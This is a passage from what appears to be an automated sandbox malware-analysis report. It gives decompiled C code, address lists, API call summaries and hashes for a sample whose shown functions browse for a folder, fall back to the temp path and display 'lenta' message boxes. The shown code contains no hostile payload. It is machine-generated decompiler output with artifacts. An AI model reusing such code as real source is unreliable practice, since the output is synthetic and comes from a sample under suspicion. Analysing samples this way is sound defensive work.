                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				char* _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				char* _t61;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				char* _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				void* _t71;
                                                                                                                                                                                                                                              				char _t76;
                                                                                                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t67 = __ecx;
                                                                                                                                                                                                                                              				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                              				if(_t66 == 0) {
                                                                                                                                                                                                                                              					_t63 = 0x4c2;
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					E00A844B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                              				_v12 = _t26;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					FreeLibrary(_t66);
                                                                                                                                                                                                                                              					_t63 = 0x4c1;
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                              				_v20 = _t28;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                              				_v16 = _t29;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t76 =  *0xa888c0; // 0x0
                                                                                                                                                                                                                                              				if(_t76 != 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					 *0xa887a0 = 0;
                                                                                                                                                                                                                                              					_v52 = _t67;
                                                                                                                                                                                                                                              					_v48 = 0;
                                                                                                                                                                                                                                              					_v44 = 0;
                                                                                                                                                                                                                                              					_v40 = 0xa88598;
                                                                                                                                                                                                                                              					_v36 = 1;
                                                                                                                                                                                                                                              					_v32 = E00A84200;
                                                                                                                                                                                                                                              					_v28 = 0xa888c0;
                                                                                                                                                                                                                                              					 *0xa8a288( &_v52);
                                                                                                                                                                                                                                              					_t32 =  *_v12();
                                                                                                                                                                                                                                              					if(_t71 != _t71) {
                                                                                                                                                                                                                                              						asm("int 0x29");
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_v12 = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						 *0xa8a288(_t32, 0xa888c0);
                                                                                                                                                                                                                                              						 *_v16();
                                                                                                                                                                                                                                              						if(_t71 != _t71) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *0xa888c0 != 0) {
                                                                                                                                                                                                                                              							E00A81680(0xa887a0, 0x104, 0xa888c0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0xa8a288(_v12);
                                                                                                                                                                                                                                              						 *_v20();
                                                                                                                                                                                                                                              						if(_t71 != _t71) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t66);
                                                                                                                                                                                                                                              					_t85 =  *0xa887a0; // 0x0
                                                                                                                                                                                                                                              					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					GetTempPathA(0x104, 0xa888c0);
                                                                                                                                                                                                                                              					_t61 = 0xa888c0;
                                                                                                                                                                                                                                              					_t4 =  &(_t61[1]); // 0xa888c1
                                                                                                                                                                                                                                              					_t65 = _t4;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t42 =  *_t61;
                                                                                                                                                                                                                                              						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                              					} while (_t42 != 0);
                                                                                                                                                                                                                                              					_t5 = _t61 - _t65 + 0xa888c0; // 0x1511181
                                                                                                                                                                                                                                              					_t44 = CharPrevA(0xa888c0, _t5);
                                                                                                                                                                                                                                              					_v8 = _t44;
                                                                                                                                                                                                                                              					if( *_t44 == 0x5c &&  *(CharPrevA(0xa888c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                              						 *_v8 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}




























                                                                                                                                                                                                                                              0x00a84234
                                                                                                                                                                                                                                              0x00a8423c
                                                                                                                                                                                                                                              0x00a84240
                                                                                                                                                                                                                                              0x00a843b2
                                                                                                                                                                                                                                              0x00a843b7
                                                                                                                                                                                                                                              0x00a843c0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a843c5
                                                                                                                                                                                                                                              0x00a8424c
                                                                                                                                                                                                                                              0x00a84252
                                                                                                                                                                                                                                              0x00a84257
                                                                                                                                                                                                                                              0x00a843a4
                                                                                                                                                                                                                                              0x00a843a5
                                                                                                                                                                                                                                              0x00a843ab
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a843ab
                                                                                                                                                                                                                                              0x00a84263
                                                                                                                                                                                                                                              0x00a84269
                                                                                                                                                                                                                                              0x00a8426e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8427a
                                                                                                                                                                                                                                              0x00a84280
                                                                                                                                                                                                                                              0x00a84285
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8428d
                                                                                                                                                                                                                                              0x00a84293
                                                                                                                                                                                                                                              0x00a842e6
                                                                                                                                                                                                                                              0x00a842e9
                                                                                                                                                                                                                                              0x00a842ef
                                                                                                                                                                                                                                              0x00a842f4
                                                                                                                                                                                                                                              0x00a842f7
                                                                                                                                                                                                                                              0x00a84300
                                                                                                                                                                                                                                              0x00a84307
                                                                                                                                                                                                                                              0x00a8430e
                                                                                                                                                                                                                                              0x00a84315
                                                                                                                                                                                                                                              0x00a8431c
                                                                                                                                                                                                                                              0x00a84322
                                                                                                                                                                                                                                              0x00a84326
                                                                                                                                                                                                                                              0x00a8432d
                                                                                                                                                                                                                                              0x00a8432d
                                                                                                                                                                                                                                              0x00a8432f
                                                                                                                                                                                                                                              0x00a84334
                                                                                                                                                                                                                                              0x00a84343
                                                                                                                                                                                                                                              0x00a84349
                                                                                                                                                                                                                                              0x00a8434d
                                                                                                                                                                                                                                              0x00a84354
                                                                                                                                                                                                                                              0x00a84354
                                                                                                                                                                                                                                              0x00a8435d
                                                                                                                                                                                                                                              0x00a8436e
                                                                                                                                                                                                                                              0x00a8436e
                                                                                                                                                                                                                                              0x00a8437d
                                                                                                                                                                                                                                              0x00a84383
                                                                                                                                                                                                                                              0x00a84387
                                                                                                                                                                                                                                              0x00a8438e
                                                                                                                                                                                                                                              0x00a8438e
                                                                                                                                                                                                                                              0x00a84387
                                                                                                                                                                                                                                              0x00a84391
                                                                                                                                                                                                                                              0x00a84399
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84295
                                                                                                                                                                                                                                              0x00a8429f
                                                                                                                                                                                                                                              0x00a842a5
                                                                                                                                                                                                                                              0x00a842aa
                                                                                                                                                                                                                                              0x00a842aa
                                                                                                                                                                                                                                              0x00a842ad
                                                                                                                                                                                                                                              0x00a842ad
                                                                                                                                                                                                                                              0x00a842af
                                                                                                                                                                                                                                              0x00a842b0
                                                                                                                                                                                                                                              0x00a842b6
                                                                                                                                                                                                                                              0x00a842c2
                                                                                                                                                                                                                                              0x00a842c8
                                                                                                                                                                                                                                              0x00a842ce
                                                                                                                                                                                                                                              0x00a842e4
                                                                                                                                                                                                                                              0x00a842e4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a842ce

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A84236
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A8424C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A84263
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A8427A
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,00A888C0,?,00000001), ref: 00A8429F
                                                                                                                                                                                                                                              • CharPrevA.USER32(00A888C0,01511181,?,00000001), ref: 00A842C2
                                                                                                                                                                                                                                              • CharPrevA.USER32(00A888C0,00000000,?,00000001), ref: 00A842D6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A84391
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A843A5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                              • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                              • Opcode ID: 00532fd3f0903490c20aa49b9011959676cc7f9c32c179a402ca3ac9d31cf680
                                                                                                                                                                                                                                              • Instruction ID: 86e7f9d9e02216610145d660005d8a19d4f57e9cc4c680e5a98c24b7d331c2d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00532fd3f0903490c20aa49b9011959676cc7f9c32c179a402ca3ac9d31cf680
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49410474A00305AFE711FFB4DC88AAE7BB5EB49384F84456AE941A7291DF788C02C761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                                                                              				char _v576;
                                                                                                                                                                                                                                              				void* _v580;
                                                                                                                                                                                                                                              				struct HWND__* _v584;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				signed int _t52;
                                                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                                                              				intOrPtr _t55;
                                                                                                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                                                                                                              				int _t64;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                                                                              				intOrPtr* _t76;
                                                                                                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				void* _t81;
                                                                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                                                                              				intOrPtr* _t84;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				signed int _t89;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t75 = __edx;
                                                                                                                                                                                                                                              				_t34 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                              				_v584 = __ecx;
                                                                                                                                                                                                                                              				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                              				_t67 = _a4;
                                                                                                                                                                                                                                              				_t69 = 0xd;
                                                                                                                                                                                                                                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                              				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                              				_v580 = _t37;
                                                                                                                                                                                                                                              				asm("movsb");
                                                                                                                                                                                                                                              				if(( *0xa88a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              					_t39 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_v576 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0xa89a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                              					if(_v576 != 0) {
                                                                                                                                                                                                                                              						_t73 =  &_v576;
                                                                                                                                                                                                                                              						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                              						_t75 = _t16;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t43 =  *_t73;
                                                                                                                                                                                                                                              							_t73 = _t73 + 1;
                                                                                                                                                                                                                                              						} while (_t43 != 0);
                                                                                                                                                                                                                                              						_t84 = _v580;
                                                                                                                                                                                                                                              						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                              						if(_t84 == 0) {
                                                                                                                                                                                                                                              							if(_t67 == 0) {
                                                                                                                                                                                                                                              								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                              								_t83 = _t27;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t75 = _t83;
                                                                                                                                                                                                                                              									_t74 = _t80;
                                                                                                                                                                                                                                              									E00A81680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t76 = _t67;
                                                                                                                                                                                                                                              								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                              								_t85 = _t24;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t55 =  *_t76;
                                                                                                                                                                                                                                              									_t76 = _t76 + 1;
                                                                                                                                                                                                                                              								} while (_t55 != 0);
                                                                                                                                                                                                                                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                              								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00A8171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t77 = _t67;
                                                                                                                                                                                                                                              							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                              							_t81 = _t18;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t58 =  *_t77;
                                                                                                                                                                                                                                              								_t77 = _t77 + 1;
                                                                                                                                                                                                                                              							} while (_t58 != 0);
                                                                                                                                                                                                                                              							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                              							_t82 = _t84 + 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t59 =  *_t84;
                                                                                                                                                                                                                                              								_t84 = _t84 + 1;
                                                                                                                                                                                                                                              							} while (_t59 != 0);
                                                                                                                                                                                                                                              							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                              							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                              							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                              							_t80 = _t44;
                                                                                                                                                                                                                                              							if(_t80 == 0) {
                                                                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_push(_v580);
                                                                                                                                                                                                                                              								E00A8171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              								L23:
                                                                                                                                                                                                                                              								MessageBeep(_a12);
                                                                                                                                                                                                                                              								if(E00A8681F(_t67) == 0) {
                                                                                                                                                                                                                                              									L25:
                                                                                                                                                                                                                                              									_t49 = 0x10000;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t54 = E00A867C9(_t74, _t74);
                                                                                                                                                                                                                                              									_t49 = 0x190000;
                                                                                                                                                                                                                                              									if(_t54 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                                                                                                                                                                                              								_t83 = _t52;
                                                                                                                                                                                                                                              								LocalFree(_t80);
                                                                                                                                                                                                                                              								_t39 = _t52;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(E00A8681F(_t67) == 0) {
                                                                                                                                                                                                                                              							L4:
                                                                                                                                                                                                                                              							_t64 = 0x10010;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t66 = E00A867C9(0, 0);
                                                                                                                                                                                                                                              							_t64 = 0x190010;
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								goto L4;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x00a844b9
                                                                                                                                                                                                                                              0x00a844c4
                                                                                                                                                                                                                                              0x00a844cb
                                                                                                                                                                                                                                              0x00a844d8
                                                                                                                                                                                                                                              0x00a844e4
                                                                                                                                                                                                                                              0x00a844eb
                                                                                                                                                                                                                                              0x00a844ee
                                                                                                                                                                                                                                              0x00a844ef
                                                                                                                                                                                                                                              0x00a844ef
                                                                                                                                                                                                                                              0x00a844f1
                                                                                                                                                                                                                                              0x00a844f7
                                                                                                                                                                                                                                              0x00a844f8
                                                                                                                                                                                                                                              0x00a8467b
                                                                                                                                                                                                                                              0x00a844fe
                                                                                                                                                                                                                                              0x00a84509
                                                                                                                                                                                                                                              0x00a84518
                                                                                                                                                                                                                                              0x00a84525
                                                                                                                                                                                                                                              0x00a84562
                                                                                                                                                                                                                                              0x00a84568
                                                                                                                                                                                                                                              0x00a84568
                                                                                                                                                                                                                                              0x00a8456b
                                                                                                                                                                                                                                              0x00a8456b
                                                                                                                                                                                                                                              0x00a8456d
                                                                                                                                                                                                                                              0x00a8456e
                                                                                                                                                                                                                                              0x00a84572
                                                                                                                                                                                                                                              0x00a84578
                                                                                                                                                                                                                                              0x00a8457c
                                                                                                                                                                                                                                              0x00a845cb
                                                                                                                                                                                                                                              0x00a84607
                                                                                                                                                                                                                                              0x00a84607
                                                                                                                                                                                                                                              0x00a8460d
                                                                                                                                                                                                                                              0x00a84613
                                                                                                                                                                                                                                              0x00a84617
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8461d
                                                                                                                                                                                                                                              0x00a84623
                                                                                                                                                                                                                                              0x00a84626
                                                                                                                                                                                                                                              0x00a84628
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84628
                                                                                                                                                                                                                                              0x00a845cd
                                                                                                                                                                                                                                              0x00a845cd
                                                                                                                                                                                                                                              0x00a845cf
                                                                                                                                                                                                                                              0x00a845cf
                                                                                                                                                                                                                                              0x00a845d2
                                                                                                                                                                                                                                              0x00a845d2
                                                                                                                                                                                                                                              0x00a845d4
                                                                                                                                                                                                                                              0x00a845d5
                                                                                                                                                                                                                                              0x00a845db
                                                                                                                                                                                                                                              0x00a845de
                                                                                                                                                                                                                                              0x00a845e3
                                                                                                                                                                                                                                              0x00a845e9
                                                                                                                                                                                                                                              0x00a845ed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a845f3
                                                                                                                                                                                                                                              0x00a845fd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84602
                                                                                                                                                                                                                                              0x00a845ed
                                                                                                                                                                                                                                              0x00a8457e
                                                                                                                                                                                                                                              0x00a8457e
                                                                                                                                                                                                                                              0x00a84580
                                                                                                                                                                                                                                              0x00a84580
                                                                                                                                                                                                                                              0x00a84583
                                                                                                                                                                                                                                              0x00a84583
                                                                                                                                                                                                                                              0x00a84585
                                                                                                                                                                                                                                              0x00a84586
                                                                                                                                                                                                                                              0x00a8458a
                                                                                                                                                                                                                                              0x00a8458c
                                                                                                                                                                                                                                              0x00a8458f
                                                                                                                                                                                                                                              0x00a8458f
                                                                                                                                                                                                                                              0x00a84591
                                                                                                                                                                                                                                              0x00a84592
                                                                                                                                                                                                                                              0x00a8459b
                                                                                                                                                                                                                                              0x00a8459e
                                                                                                                                                                                                                                              0x00a845a3
                                                                                                                                                                                                                                              0x00a845a9
                                                                                                                                                                                                                                              0x00a845ad
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a845af
                                                                                                                                                                                                                                              0x00a845af
                                                                                                                                                                                                                                              0x00a845bf
                                                                                                                                                                                                                                              0x00a8462d
                                                                                                                                                                                                                                              0x00a84630
                                                                                                                                                                                                                                              0x00a8463d
                                                                                                                                                                                                                                              0x00a8464e
                                                                                                                                                                                                                                              0x00a8464e
                                                                                                                                                                                                                                              0x00a8463f
                                                                                                                                                                                                                                              0x00a84640
                                                                                                                                                                                                                                              0x00a84647
                                                                                                                                                                                                                                              0x00a8464c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8464c
                                                                                                                                                                                                                                              0x00a84666
                                                                                                                                                                                                                                              0x00a8466d
                                                                                                                                                                                                                                              0x00a8466f
                                                                                                                                                                                                                                              0x00a84675
                                                                                                                                                                                                                                              0x00a84675
                                                                                                                                                                                                                                              0x00a845ad
                                                                                                                                                                                                                                              0x00a84527
                                                                                                                                                                                                                                              0x00a8452e
                                                                                                                                                                                                                                              0x00a8453f
                                                                                                                                                                                                                                              0x00a8453f
                                                                                                                                                                                                                                              0x00a84530
                                                                                                                                                                                                                                              0x00a84531
                                                                                                                                                                                                                                              0x00a84538
                                                                                                                                                                                                                                              0x00a8453d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8453d
                                                                                                                                                                                                                                              0x00a84554
                                                                                                                                                                                                                                              0x00a8455a
                                                                                                                                                                                                                                              0x00a8455a
                                                                                                                                                                                                                                              0x00a8455a
                                                                                                                                                                                                                                              0x00a84525
                                                                                                                                                                                                                                              0x00a8468c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A845A3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A845E3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A8460D
                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00A84630
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00A84666
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00A8466F
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A8686E
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: GetSystemMetrics.USER32(0000004A), ref: 00A868A7
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A868CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: RegQueryValueExA.ADVAPI32(?,00A81140,00000000,?,?,0000000C), ref: 00A868F4
                                                                                                                                                                                                                                                • Part of subcall function 00A8681F: RegCloseKey.ADVAPI32(?), ref: 00A86902
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                              • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                              • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                              • Opcode ID: fd0d461c7b1677b9ffc8c077a038731a0c970258cfe0dba0aaf7b67eec2b27a3
                                                                                                                                                                                                                                              • Instruction ID: 9532de633f5915d64278f21a54963c6951fb98305345ca3b6e2b3dead545c3ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd0d461c7b1677b9ffc8c077a038731a0c970258cfe0dba0aaf7b67eec2b27a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E51D672900216ABEB21FF68CC48BBA7B79EF49300F1441A5FD49A7241EB75DD06CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A82773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v269;
                                                                                                                                                                                                                                              				CHAR* _v276;
                                                                                                                                                                                                                                              				int _v280;
                                                                                                                                                                                                                                              				void* _v284;
                                                                                                                                                                                                                                              				int _v288;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				int _t45;
                                                                                                                                                                                                                                              				int* _t50;
